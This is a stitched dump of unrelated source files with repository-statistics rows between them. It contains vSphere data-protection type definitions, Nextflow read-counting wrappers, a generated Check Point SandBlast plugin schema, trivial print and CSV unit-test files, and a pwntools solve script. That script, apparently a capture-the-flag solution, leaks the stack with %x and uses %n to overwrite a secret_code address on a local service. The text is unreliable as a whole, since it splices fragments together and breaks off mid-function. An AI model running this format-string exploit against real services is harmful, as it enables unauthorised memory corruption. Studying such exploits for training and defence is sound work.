"dp.version.VSPHERE_DP_TELEMETRY", (), (F_OPTIONAL, "string[]", "string[]"), None, None), ("GetMetricInfo", "GetMetricInfo", "dp.version.VSPHERE_DP_TELEMETRY", (("metrics", "string[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL, None),), (F_OPTIONAL, "dp.telemetry.TelemetryStats.MetricInfo[]", "dp.telemetry.TelemetryStats.MetricInfo[]"), None, None), ("QueryMetrics", "QueryMetrics", "dp.version.VSPHERE_DP_TELEMETRY", (("spec", "dp.telemetry.TelemetryStats.QueryMetricsSpec", "dp.version.VSPHERE_DP_TELEMETRY", 0, None),), (F_OPTIONAL, "dp.telemetry.TelemetryStats.MetricResults", "dp.telemetry.TelemetryStats.MetricResults"), None, None)])
CreateEnumType("dp.ProtectionService.SnapshotType", "DpProtectionServiceSnapshotType", "dp.version.version1", ["crashConsistent", "applicationConsistent", "vssAppConsistentFull", "vssAppConsistentCopy", "metadataOnly", "vssAppConsistent"])
CreateEnumType("dp.ProtectionService.VssBackupType", "DpProtectionServiceVssBackupType", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", ["vssBackupTypeFull", "vssBackupTypeCopy"])
CreateEnumType("dp.ProtectionService.VssBackupContext", "DpProtectionServiceVssBackupContext", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", ["vssBackupContextAuto", "vssBackupContextBackup", "vssBackupContextFileShareBackup"])
CreateDataType("dp.ProtectionService.VssBackupSpec", "DpProtectionServiceVssBackupSpec", "vmodl.DynamicData", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", [("vssBackupType", "string", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", 0), ("vssBackupContext", "string", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", 0), ("timeout", "int", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", F_OPTIONAL)])
CreateDataType("dp.ProtectionService.SnapshotOp", "DpProtectionServiceSnapshotOp", "vmodl.DynamicData", "dp.version.version1", [("result", "dp.ProtectionService.SnapshotOp.Result", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.SnapshotOp.Spec", "DpProtectionServiceSnapshotOpSpec", "vmodl.DynamicData", "dp.version.version1", [("pe", "dp.ProtectedEntity", "dp.version.version1", 0), ("peSnapshotType", "string", "dp.version.v8_0_0_0", F_OPTIONAL), ("snapshotType", "dp.ProtectionService.SnapshotType", "dp.version.version1", F_OPTIONAL), ("baseSnapshotId", "string", "dp.version.version1", F_OPTIONAL), ("basePeSnapshot", "dp.ProtectedEntitySnapshot", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", F_OPTIONAL), ("vssBackupSpec", "dp.ProtectionService.VssBackupSpec", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", F_OPTIONAL)])
CreateDataType("dp.ProtectionService.SnapshotOp.Result", "DpProtectionServiceSnapshotOpResult", "vmodl.DynamicData", "dp.version.version1", [("task", "vim.Task", "dp.version.version1", 0), ("snapshotId", "string", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.SnapshotOp.TaskResult", "DpProtectionServiceSnapshotOpTaskResult", "vmodl.DynamicData", "dp.version.version1", [("associatedFiles", "string[]", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.ProtectionService.RetireSnapshotOp", "DpProtectionServiceRetireSnapshotOp", "vmodl.DynamicData", "dp.version.version1", [("result", "dp.ProtectionService.RetireSnapshotOp.Result", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.RetireSnapshotOp.Spec", "DpProtectionServiceRetireSnapshotOpSpec", "vmodl.DynamicData", "dp.version.version1", [("pe", "dp.ProtectedEntity", "dp.version.version1", 0), ("snapshotId", "string", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.RetireSnapshotOp.Result", "DpProtectionServiceRetireSnapshotOpResult", "vmodl.DynamicData", "dp.version.version1", [("task", "vim.Task", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.CancelSnapshotOp", "DpProtectionServiceCancelSnapshotOp", "vmodl.DynamicData", "dp.version.version1", [("result", "dp.ProtectionService.CancelSnapshotOp.Result", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.CancelSnapshotOp.Spec", "DpProtectionServiceCancelSnapshotOpSpec", "vmodl.DynamicData", "dp.version.version1", [("pe", "dp.ProtectedEntity", "dp.version.version1", 0), ("snapshotId", "string", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.CancelSnapshotOp.Result", "DpProtectionServiceCancelSnapshotOpResult", "vmodl.DynamicData", "dp.version.version1", [("task", "vim.Task", "dp.version.version1", 0)])
CreateEnumType("dp.ProtectionService.SyncType", "DpProtectionServiceSyncType", "dp.version.version1", ["fullSync", "deltaSync"])
CreateDataType("dp.ProtectionService.SyncOp", "DpProtectionServiceSyncOp", "vmodl.DynamicData", "dp.version.version1", [("result", "dp.ProtectionService.SyncOp.Result", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.SyncOp.Spec", "DpProtectionServiceSyncOpSpec", "vmodl.DynamicData", "dp.version.version1", [("pe", "dp.ProtectedEntity", "dp.version.version1", 0), ("transportProvider", "string", "dp.version.version1", 0), ("transportProviderOptions", "vim.KeyValue[]", "dp.version.version1", F_OPTIONAL), ("userIds", "dp.UserIdBinding", "dp.version.version1", F_OPTIONAL), ("synchronizationType", "string", "dp.version.v8_0_0_0", F_OPTIONAL), ("syncType", "dp.ProtectionService.SyncType", "dp.version.version1", F_OPTIONAL), ("initiatorId", "string", "dp.version.version1", 0), ("snapshotId", "string", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.ProtectionService.SyncOp.Result", "DpProtectionServiceSyncOpResult", "vmodl.DynamicData", "dp.version.version1", [("task", "vim.Task", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.SyncOp.TaskResult", "DpProtectionServiceSyncOpTaskResult", "vmodl.DynamicData", "dp.version.version1", [("transportProviderResults", "vim.KeyValue[]", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.ProtectionService.PrepareRestoreOp", "DpProtectionServicePrepareRestoreOp", "vmodl.DynamicData", "dp.version.version1", [("result", "dp.ProtectionService.PrepareRestoreOp.Result", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.PrepareRestoreOp.Spec", "DpProtectionServicePrepareRestoreOpSpec", "vmodl.DynamicData", "dp.version.version1", [("pe", "dp.ProtectedEntity", "dp.version.version1", 0), ("transportProvider", "string", "dp.version.version1", 0), ("transportProviderOptions", "vim.KeyValue[]", "dp.version.version1", F_OPTIONAL), ("userIds", "dp.UserIdBinding", "dp.version.version1", F_OPTIONAL), ("initiatorId", "string", "dp.version.version1", 0), ("snapshotId", "string", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.ProtectionService.PrepareRestoreOp.Result", "DpProtectionServicePrepareRestoreOpResult", "vmodl.DynamicData", "dp.version.version1", [("task", "vim.Task", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.PrepareRestoreOp.TaskResult", "DpProtectionServicePrepareRestoreOpTaskResult", "vmodl.DynamicData", "dp.version.version1", [("transportProviderResults", "vim.KeyValue[]", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.ProtectionService.CommitRestoreOp", "DpProtectionServiceCommitRestoreOp", "vmodl.DynamicData", "dp.version.version1", [("result", "dp.ProtectionService.CommitRestoreOp.Result", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.CommitRestoreOp.Spec", "DpProtectionServiceCommitRestoreOpSpec", "vmodl.DynamicData", "dp.version.version1", [("pe", "dp.ProtectedEntity", "dp.version.version1", 0), ("transportProvider", "string", "dp.version.version1", 0), ("transportProviderOptions", "vim.KeyValue[]", "dp.version.version1", F_OPTIONAL), ("userIds", "dp.UserIdBinding", "dp.version.version1", F_OPTIONAL), ("initiatorId", "string", "dp.version.version1", 0), ("snapshotId", "string", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.ProtectionService.CommitRestoreOp.Result", "DpProtectionServiceCommitRestoreOpResult", "vmodl.DynamicData", "dp.version.version1", [("task", "vim.Task", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.CommitRestoreOp.TaskResult", "DpProtectionServiceCommitRestoreOpTaskResult", "vmodl.DynamicData", "dp.version.version1", [("transportProviderResults", "vim.KeyValue[]", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.fault.AlreadyLoggedIn", "DpFaultAlreadyLoggedIn", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.BaseSnapshotMismatch", "DpFaultBaseSnapshotMismatch", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.CancelSnapshotRequired", "DpFaultCancelSnapshotRequired", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.DiskClosing", "DpFaultDiskClosing", "dp.fault.DpFault", "dp.version.version1", None)
| 76.359013
| 2,514
| 0.815153
| 42,975
| 358,811
| 6.619756
| 0.012379
| 0.263108
| 0.366671
| 0.053876
| 0.96687
| 0.956331
| 0.757726
| 0.595316
| 0.436404
| 0.214047
| 0
| 0.036482
| 0.029358
| 358,811
| 4,698
| 2,515
| 76.375266
| 0.78035
| 0.000164
| 0
| 0
| 1
| 0
| 0.660728
| 0.433982
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.001704
| 0
| 0.001704
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
79f08b430a59bbb58547868268f8a33630753836
| 92
|
py
|
Python
|
test2.py
|
Ambareezh/pyneta
|
a64a2c213847bdec0af4064730c2c6f1d47575c7
|
[
"Apache-2.0"
] | null | null | null |
test2.py
|
Ambareezh/pyneta
|
a64a2c213847bdec0af4064730c2c6f1d47575c7
|
[
"Apache-2.0"
] | null | null | null |
test2.py
|
Ambareezh/pyneta
|
a64a2c213847bdec0af4064730c2c6f1d47575c7
|
[
"Apache-2.0"
] | null | null | null |
print("Hai")
print("Hai")
print("Hai")
print("Hai")
print("Hai")
print("Hai")
print("Hai")
| 10.222222
| 12
| 0.608696
| 14
| 92
| 4
| 0.142857
| 1
| 1.392857
| 1.714286
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.086957
| 92
| 8
| 13
| 11.5
| 0.666667
| 0
| 0
| 1
| 0
| 0
| 0.228261
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 14
|
79f1edbb88a6a6afd2bb91b0da8def96b8a50377
| 4,325
|
py
|
Python
|
readCounters.py
|
szabogtamas/commonNFnodes
|
1244328723c1e32a98e7d194bce3bf1028822eaa
|
[
"MIT"
] | null | null | null |
readCounters.py
|
szabogtamas/commonNFnodes
|
1244328723c1e32a98e7d194bce3bf1028822eaa
|
[
"MIT"
] | null | null | null |
readCounters.py
|
szabogtamas/commonNFnodes
|
1244328723c1e32a98e7d194bce3bf1028822eaa
|
[
"MIT"
] | null | null | null |
from nodePrototypes import nextflowCmdProcess
class countWithFeatureCounts(nextflowCmdProcess):
"Count reads with FeatureCounts, using general settings."
def directives(self):
return {"publishDir": "'../tables', mode: 'copy'", "label": "'manycpu'"}
def customize_features(self):
self.inputs = [
"val manycpu from params.manycpu",
"val count_file from params.count_file",
"val genomeannotation from params.genomeannotation",
"file alignedSams from aligned.collect()",
]
self.outputs = ["file 'counts.tsv' into count_file"]
self.command = "featureCounts -T $manycpu\\\n "
self.command += "-a $genomeannotation\\\n "
self.command += "-o $count_file\\\n "
self.command += "${alignedSams.join(' ')}\\\n"
return None
class countSymbolsWithFeatureCounts(nextflowCmdProcess):
"Count reads with FeatureCounts, using general settings."
def directives(self):
return {"publishDir": "'../tables', mode: 'copy'", "label": "'manycpu'"}
def customize_features(self):
self.inputs = [
"val manycpu from params.manycpu",
"val count_file from params.count_file",
"val genomeannotation from params.genomeannotation",
"file alignedSams from aligned.collect()",
]
self.outputs = ["file 'counts.tsv' into count_file"]
self.command = "featureCounts -T $manycpu\\\n "
self.command += "-a $genomeannotation\\\n "
self.command += "-o $count_file\\\n "
self.command += "-g gene_name\\\n "
self.command += "${alignedSams.join(' ')}\\\n"
return None
class countWithHTSeqCounts(nextflowCmdProcess):
"Count reads with HTSeqCounts, using general settings."
def directives(self):
return {"publishDir": "'../tables', mode: 'copy'", "label": "'manycpu'"}
def customize_features(self):
self.inputs = [
"val manycpu from params.manycpu",
"val count_file from params.count_file",
"val genomeannotation from params.genomeannotation",
"file alignedSams from aligned.collect()",
]
self.outputs = ["file 'counts.tsv' into count_file"]
self.command = "htseq-count\\\n "
self.command += "-o $count_file\\\n "
self.command += "${alignedSams.join(' ')} "
self.command += "$genomeannotation\\\n"
return None
class countWithSalmon(nextflowCmdProcess):
"Count reads with Salmon, using general settings."
def directives(self):
return {"publishDir": "'../tables', mode: 'copy'", "label": "'manycpu'"}
def customize_features(self):
self.inputs = [
"val manycpu from params.manycpu",
"val genomeindex from params.genomeindex" # e.g. /home/szabo/myScratch/SeqmiRNA/indices/salmon
'tuple sample, "${sample}_trimed.fastq" from trimmed_fastqs',
]
self.outputs = ["file '${alignedSams}_counts.tsv' into count_file"]
self.command = "salmon quant\\\n "
self.command += "-p $manycpu -l A\\\n "
self.command += "--validateMappings\\\n "
self.command += "-r ${alignedSams.join(' ')}\\\n "
self.command += "-o $count_file\\\n"
return None
class countWithSalmonAligned(nextflowCmdProcess):
"Count reads with Salmon, using general settings and alignment mode."
def directives(self):
return {"publishDir": "'../tables', mode: 'copy'", "label": "'manycpu'"}
def customize_features(self):
self.inputs = [
"val manycpu from params.manycpu",
"val genomeindex from params.genomeindex" # e.g. salmon.fa
"file alignedSams from aligned.collect()",
]
self.outputs = ["file 'counts.tsv' into count_file"]
self.command = "salmon quant\\\n "
self.command += "-t $genomeindex -l A\\\n "
self.command += "-p $manycpu -l A\\\n "
self.command += "-a ${sample}_trimed.fastq\\\n "
self.command += "-o $count_file\\\n"
return None
| 40.046296
| 106
| 0.574566
| 428
| 4,325
| 5.745327
| 0.175234
| 0.102887
| 0.082961
| 0.065067
| 0.807645
| 0.806832
| 0.806832
| 0.806832
| 0.767792
| 0.716958
| 0
| 0
| 0.28763
| 4,325
| 107
| 107
| 40.420561
| 0.798117
| 0.080694
| 0
| 0.724138
| 0
| 0
| 0.500352
| 0.054264
| 0
| 0
| 0
| 0
| 0
| 1
| 0.114943
| false
| 0
| 0.011494
| 0.057471
| 0.298851
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
031bb2a444a04924385f6f1cc40279d134378e0c
| 940
|
py
|
Python
|
pwn/mission-control/solve.py
|
zeyu2001/STANDCON-Challenges
|
ba302a01e0f644c7fc84ca6c64f24ad5b4a082e0
|
[
"MIT"
] | 3
|
2021-07-25T11:01:21.000Z
|
2022-03-28T13:31:36.000Z
|
pwn/mission-control/solve.py
|
zeyu2001/STANDCON-Challenges
|
ba302a01e0f644c7fc84ca6c64f24ad5b4a082e0
|
[
"MIT"
] | null | null | null |
pwn/mission-control/solve.py
|
zeyu2001/STANDCON-Challenges
|
ba302a01e0f644c7fc84ca6c64f24ad5b4a082e0
|
[
"MIT"
] | null | null | null |
from pwn import *
# Bruteforce the index of the buffer
conn = remote("localhost", 50000)
print(conn.recv())
conn.send("I am not a robotBBAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x\r\n")
print(conn.recv())
# Check the index of the buffer
conn = remote("localhost", 50000)
print(conn.recv())
conn.send(b"I am not a robotBBAAAA%11$p\r\n")
print(conn.recv())
# Overwrite the secret_code address
conn = remote("localhost", 50000)
print(conn.recv())
conn.send(b"I am not a robotBB\xbc\xff\x0d\x08%168x%11$n\r\n") # 080dffbc
print(conn.recv())
conn.interactive()
| 33.571429
| 451
| 0.543617
| 229
| 940
| 2.227074
| 0.170306
| 0.537255
| 0.8
| 1.058824
| 0.756863
| 0.641176
| 0.641176
| 0.641176
| 0.641176
| 0.641176
| 0
| 0.032147
| 0.073404
| 940
| 27
| 452
| 34.814815
| 0.553387
| 0.11383
| 0
| 0.642857
| 0
| 0.142857
| 0.657005
| 0.560386
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0.428571
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
0358eae2f48244ea38079cd899289776007b52c3
| 11,080
|
py
|
Python
|
checkpoint_sand_blast/komand_checkpoint_sand_blast/actions/upload/schema.py
|
xhennessy-r7/insightconnect-plugins
|
59268051313d67735b5dd3a30222eccb92aca8e9
|
[
"MIT"
] | null | null | null |
checkpoint_sand_blast/komand_checkpoint_sand_blast/actions/upload/schema.py
|
xhennessy-r7/insightconnect-plugins
|
59268051313d67735b5dd3a30222eccb92aca8e9
|
[
"MIT"
] | null | null | null |
checkpoint_sand_blast/komand_checkpoint_sand_blast/actions/upload/schema.py
|
xhennessy-r7/insightconnect-plugins
|
59268051313d67735b5dd3a30222eccb92aca8e9
|
[
"MIT"
] | null | null | null |
# GENERATED BY KOMAND SDK - DO NOT EDIT
import komand
import json
class Input:
FILE_BYTES = "file_bytes"
FILE_NAME = "file_name"
FILE_TYPE = "file_type"
class Output:
RESULTS = "results"
class UploadInput(komand.Input):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"file_bytes": {
"type": "string",
"title": "File Bytes",
"displayType": "bytes",
"description": "The file bytes",
"format": "bytes",
"order": 3
},
"file_name": {
"type": "string",
"title": "File Name",
"description": "The name of the file",
"order": 1
},
"file_type": {
"type": "string",
"title": "File Type",
"description": "File extension e.g. docx, pdf, ect",
"order": 2
}
},
"required": [
"file_name",
"file_bytes"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
class UploadOutput(komand.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"results": {
"$ref": "#/definitions/upload_response",
"title": "Results",
"description": "Results from the upload",
"order": 1
}
},
"definitions": {
"images": {
"type": "object",
"title": "images",
"properties": {
"id": {
"type": "string",
"title": "Id",
"order": 3
},
"report": {
"$ref": "#/definitions/report",
"title": "Report",
"order": 1
},
"revision": {
"type": "integer",
"title": "Revision",
"order": 4
},
"status": {
"type": "string",
"title": "Status",
"order": 2
}
},
"definitions": {
"report": {
"type": "object",
"title": "report",
"properties": {
"verdict": {
"type": "string",
"title": "Verdict",
"order": 1
}
}
}
}
},
"report": {
"type": "object",
"title": "report",
"properties": {
"verdict": {
"type": "string",
"title": "Verdict",
"order": 1
}
}
},
"status": {
"type": "object",
"title": "status",
"properties": {
"code": {
"type": "integer",
"title": "Code",
"order": 1
},
"label": {
"type": "string",
"title": "Label",
"order": 2
},
"message": {
"type": "string",
"title": "Message",
"order": 3
}
}
},
"threat_emulation": {
"type": "object",
"title": "threat_emulation",
"properties": {
"combined_verdict": {
"type": "string",
"title": "Combined Verdict",
"order": 3
},
"images": {
"type": "array",
"title": "Images",
"items": {
"$ref": "#/definitions/images"
},
"order": 2
},
"score": {
"type": "integer",
"title": "Score",
"order": 4
},
"status": {
"$ref": "#/definitions/status",
"title": "Status",
"order": 5
},
"trust": {
"type": "integer",
"title": "Trust",
"order": 1
}
},
"definitions": {
"images": {
"type": "object",
"title": "images",
"properties": {
"id": {
"type": "string",
"title": "Id",
"order": 3
},
"report": {
"$ref": "#/definitions/report",
"title": "Report",
"order": 1
},
"revision": {
"type": "integer",
"title": "Revision",
"order": 4
},
"status": {
"type": "string",
"title": "Status",
"order": 2
}
},
"definitions": {
"report": {
"type": "object",
"title": "report",
"properties": {
"verdict": {
"type": "string",
"title": "Verdict",
"order": 1
}
}
}
}
},
"report": {
"type": "object",
"title": "report",
"properties": {
"verdict": {
"type": "string",
"title": "Verdict",
"order": 1
}
}
},
"status": {
"type": "object",
"title": "status",
"properties": {
"code": {
"type": "integer",
"title": "Code",
"order": 1
},
"label": {
"type": "string",
"title": "Label",
"order": 2
},
"message": {
"type": "string",
"title": "Message",
"order": 3
}
}
}
}
},
"upload_response": {
"type": "object",
"title": "upload_response",
"properties": {
"features": {
"type": "array",
"title": "Features",
"items": {
"type": "string"
},
"order": 5
},
"file_name": {
"type": "string",
"title": "File Name",
"order": 4
},
"file_type": {
"type": "string",
"title": "File Type",
"order": 3
},
"md5": {
"type": "string",
"title": "Md5",
"order": 2
},
"status": {
"$ref": "#/definitions/status",
"title": "Status",
"order": 1
},
"te": {
"$ref": "#/definitions/threat_emulation",
"title": "Te",
"order": 6
}
},
"definitions": {
"images": {
"type": "object",
"title": "images",
"properties": {
"id": {
"type": "string",
"title": "Id",
"order": 3
},
"report": {
"$ref": "#/definitions/report",
"title": "Report",
"order": 1
},
"revision": {
"type": "integer",
"title": "Revision",
"order": 4
},
"status": {
"type": "string",
"title": "Status",
"order": 2
}
},
"definitions": {
"report": {
"type": "object",
"title": "report",
"properties": {
"verdict": {
"type": "string",
"title": "Verdict",
"order": 1
}
}
}
}
},
"report": {
"type": "object",
"title": "report",
"properties": {
"verdict": {
"type": "string",
"title": "Verdict",
"order": 1
}
}
},
"status": {
"type": "object",
"title": "status",
"properties": {
"code": {
"type": "integer",
"title": "Code",
"order": 1
},
"label": {
"type": "string",
"title": "Label",
"order": 2
},
"message": {
"type": "string",
"title": "Message",
"order": 3
}
}
},
"threat_emulation": {
"type": "object",
"title": "threat_emulation",
"properties": {
"combined_verdict": {
"type": "string",
"title": "Combined Verdict",
"order": 3
},
"images": {
"type": "array",
"title": "Images",
"items": {
"$ref": "#/definitions/images"
},
"order": 2
},
"score": {
"type": "integer",
"title": "Score",
"order": 4
},
"status": {
"$ref": "#/definitions/status",
"title": "Status",
"order": 5
},
"trust": {
"type": "integer",
"title": "Trust",
"order": 1
}
},
"definitions": {
"images": {
"type": "object",
"title": "images",
"properties": {
"id": {
"type": "string",
"title": "Id",
"order": 3
},
"report": {
"$ref": "#/definitions/report",
"title": "Report",
"order": 1
},
"revision": {
"type": "integer",
"title": "Revision",
"order": 4
},
"status": {
"type": "string",
"title": "Status",
"order": 2
}
},
"definitions": {
"report": {
"type": "object",
"title": "report",
"properties": {
"verdict": {
"type": "string",
"title": "Verdict",
"order": 1
}
}
}
}
},
"report": {
"type": "object",
"title": "report",
"properties": {
"verdict": {
"type": "string",
"title": "Verdict",
"order": 1
}
}
},
"status": {
"type": "object",
"title": "status",
"properties": {
"code": {
"type": "integer",
"title": "Code",
"order": 1
},
"label": {
"type": "string",
"title": "Label",
"order": 2
},
"message": {
"type": "string",
"title": "Message",
"order": 3
}
}
}
}
}
}
}
}
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
| 23.524416
| 58
| 0.314982
| 661
| 11,080
| 5.208775
| 0.111952
| 0.095847
| 0.139413
| 0.063898
| 0.812082
| 0.812082
| 0.812082
| 0.763869
| 0.735405
| 0.735405
| 0
| 0.010833
| 0.516787
| 11,080
| 470
| 59
| 23.574468
| 0.632238
| 0.003339
| 0
| 0.679739
| 1
| 0
| 0.959877
| 0.024454
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004357
| false
| 0
| 0.004357
| 0
| 0.030501
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
036113fce85ec1a10b88458b5eac5cad8a658ca0
| 12,850
|
py
|
Python
|
tests/test_csv.py
|
klee229/CS179J-Smart-Water-Station-Project
|
7568c23dc7cd4108ca42c27bf77e18a2a74aa36f
|
[
"MIT"
] | null | null | null |
tests/test_csv.py
|
klee229/CS179J-Smart-Water-Station-Project
|
7568c23dc7cd4108ca42c27bf77e18a2a74aa36f
|
[
"MIT"
] | null | null | null |
tests/test_csv.py
|
klee229/CS179J-Smart-Water-Station-Project
|
7568c23dc7cd4108ca42c27bf77e18a2a74aa36f
|
[
"MIT"
] | 2
|
2021-09-03T20:23:32.000Z
|
2021-11-28T21:49:36.000Z
|
import unittest
import csv
import pandas as pd
class TestCSVFile(unittest.TestCase):
# NOTE: all items in user_data converted to str from int or float, this way we compare string to string for testing
def test_open_write_read_close(self):
# example users for testing
columns = ['card_uid', 'registration_state', 'name', 'age', 'sex', 'activity_level',
'daily_hydration_lower', 'daily_hydration_upper', 'water_dispensed', 'total_dispensed',
'percent_dispensed_of_daily', 'num_days', 'num_days_goal', 'avg_intake', 'last_login'
]
user_data = [
['734a266f', 'True', 'name one', '5', 'Male', 'Sedentary', '1400', '1600', '0', '100000', '0.0', '1', '0',
'1517.0', '20/08/2021 05:42:21'],
['5d81e96d', 'True', 'name two', '12', 'Female', 'Sedentary', '1600', '2000', '200', '200000', '20.0', '14',
'12', '1984.0', '11/07/2021 07:15:09'],
['4d71f56d', 'True', 'name three', '17', 'Male', 'Moderate', '2400', '2800', '500', '300000', '50.0', '28',
'19', '1000.0', '20/08/2021 16:58:59'],
['fdd1a46b', 'True', 'name four', '29', 'Female', 'Moderate', '2000', '2200', '1300', '400000', '130.0',
'33', '3', '0.0', '20/08/2021 24:24:24'],
['1d4ba46b', 'True', 'name five', '48', 'Male', 'Active', '2400', '2600', '1800', '500000', '180.0', '99',
'99', '2256.0', '20/08/2021 17:36:10'],
['dd8b9f6b', 'True', 'name six', '76', 'Female', 'Active', '1800', '1800', '2400', '600000', '240.0', '257',
'202', '1234.0', '01/01/1970 00:00:00']
]
# NOTE: enter the exact path for your machine to run locally
path = ''
# open file, write data to file
with open(path, 'w', newline='') as csv_file:
writer = csv.writer(csv_file)
writer.writerow(columns)
writer.writerows(user_data)
# open file, read data from file
with open(path, 'r', newline='') as csv_file:
reader = csv.reader(csv_file)
row_num = 0
for row in reader:
if row_num == 0:
self.assertEqual(columns, row)
else:
self.assertEqual(user_data[row_num - 1], row)
row_num += 1
csv_file.close()
def test_reopen_read_close(self):
# example users for testing
columns = ['card_uid', 'registration_state', 'name', 'age', 'sex', 'activity_level',
'daily_hydration_lower', 'daily_hydration_upper', 'water_dispensed', 'total_dispensed',
'percent_dispensed_of_daily', 'num_days', 'num_days_goal', 'avg_intake', 'last_login'
]
user_data = [
['734a266f', 'True', 'name one', '5', 'Male', 'Sedentary', '1400', '1600', '0', '100000', '0.0', '1', '0',
'1517.0', '20/08/2021 05:42:21'],
['5d81e96d', 'True', 'name two', '12', 'Female', 'Sedentary', '1600', '2000', '200', '200000', '20.0', '14',
'12', '1984.0', '11/07/2021 07:15:09'],
['4d71f56d', 'True', 'name three', '17', 'Male', 'Moderate', '2400', '2800', '500', '300000', '50.0', '28',
'19', '1000.0', '20/08/2021 16:58:59'],
['fdd1a46b', 'True', 'name four', '29', 'Female', 'Moderate', '2000', '2200', '1300', '400000', '130.0',
'33', '3', '0.0', '20/08/2021 24:24:24'],
['1d4ba46b', 'True', 'name five', '48', 'Male', 'Active', '2400', '2600', '1800', '500000', '180.0', '99',
'99', '2256.0', '20/08/2021 17:36:10'],
['dd8b9f6b', 'True', 'name six', '76', 'Female', 'Active', '1800', '1800', '2400', '600000', '240.0', '257',
'202', '1234.0', '01/01/1970 00:00:00']
]
# NOTE: enter the exact path for your machine to run locally
path = ''
# open file, read data from file
with open(path, 'r', newline='') as csv_file:
reader = csv.reader(csv_file)
row_num = 0
for row in reader:
if row_num == 0:
self.assertEqual(columns, row)
else:
self.assertEqual(user_data[row_num - 1], row)
row_num += 1
csv_file.close()
def test_add_row(self):
# example user for testing
example_user = ['1a2b3c4d', 'True', 'Test User', '76', 'Female', 'Active', '2000', '2000', '4000', '900000',
'4457.0', '400', '235', '1578.0', '02/12/1970 01:02:03']
# NOTE: enter the exact path for your machine to run locally
path = ''
# open file in append mode, write data to end of file
with open(path, 'a', newline='') as csv_file:
